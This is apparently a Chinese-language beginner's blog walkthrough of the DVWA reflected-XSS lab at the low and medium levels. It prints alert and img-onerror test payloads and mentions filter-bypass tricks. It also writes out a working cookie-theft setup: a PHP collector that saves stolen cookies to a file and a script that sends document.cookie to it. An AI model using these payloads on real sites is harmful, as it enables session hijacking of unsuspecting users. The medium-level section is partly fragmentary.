dvwa,xss反射型low&&medium

low

发现xss

本关无过滤

<script>alert(/xss/)</script>
//或
<script>confirm(/xss/)</script>
//或
<script>prompt(/xss/)</script>

出现弹框则存在xss,其中alert()confirm()prompt()为弹框函数
在这里插入图片描述

本地搭建

在www目录下放置cookie.php内容如下

<?php
 
$cookie=$_GET['cookie'];//将get请求参数存储到cookie变量中
 
file_put_contents('cookie.txt',$cookie);//把偷取的用户cookie写到cookie.txt文件中。
 
?>

js代码如下

<script>document.location='http://127.0.0.1/cookie.php/?cookie='+document.cookie;</script>
 
//document.location将页面的内容指定到指定位置。

再在www目录下放置cookie.txt文件用于存放盗取的cookie

实操

目前txt文件什么也没有,我们执行js代码
在这里插入图片描述没有报错解析成功,可以看到url地址栏中有用户的cookie此cookie已经储存进了攻击者的txt文件在这里插入图片描述盗取成功在这里插入图片描述

medium

关对

作为初学者的我第一次接触比较浅的绕过思路

Xss反射型
(一):判断是否存在xss
1:无过滤
使用弹窗函数编写js代码,成功弹框
输入其他标签:(未知领域)
输入<img src=x οnerrοr=alert(/xss/)>,成功弹窗
3:那尝试使用大小写混淆

4:或者双写绕过
<sc
5:还有很多方法自己探究吧相信在以后会掌握更多方法
(二):Js代码如下

(三):盗取cookie
本地www目录下搭建cookie.php
内容如下

<?php $cookie=$_GET['cookie'];//将get请求参数存储到cookie变量中 file_put_contents('cookie.txt',$cookie);//把偷取的用户cookie写到cookie.txt文件中。 ?>

再创建cookie.txt文档用于存储盗取的cookie

相关推荐

  1. +反射

    2024-01-30 08:02:03       21 阅读
  2. 反射xss的常用语法

    2024-01-30 08:02:03       58 阅读
  3. <span style='color:red;'>反射</span>...

    反射...

    2024-01-30 08:02:03      26 阅读
  4. JDBC封装,用泛反射实现.

    2024-01-30 08:02:03       67 阅读
  5. c# datatable 通过反射转成泛list

    2024-01-30 08:02:03       59 阅读

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-01-30 08:02:03       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-01-30 08:02:03       101 阅读
  3. 在Django里面运行非项目文件

    2024-01-30 08:02:03       82 阅读
  4. Python语言-面向对象

    2024-01-30 08:02:03       91 阅读

热门阅读

  1. mysql 正则表达式用法(一)

    2024-01-30 08:02:03       48 阅读
  2. 第二章:Django的深度潜行

    2024-01-30 08:02:03       59 阅读
  3. 什么是单例模式?它的实现方式有哪些?

    2024-01-30 08:02:03       43 阅读
  4. ·中介者模式

    2024-01-30 08:02:03       64 阅读
  5. go 面试题

    2024-01-30 08:02:03       40 阅读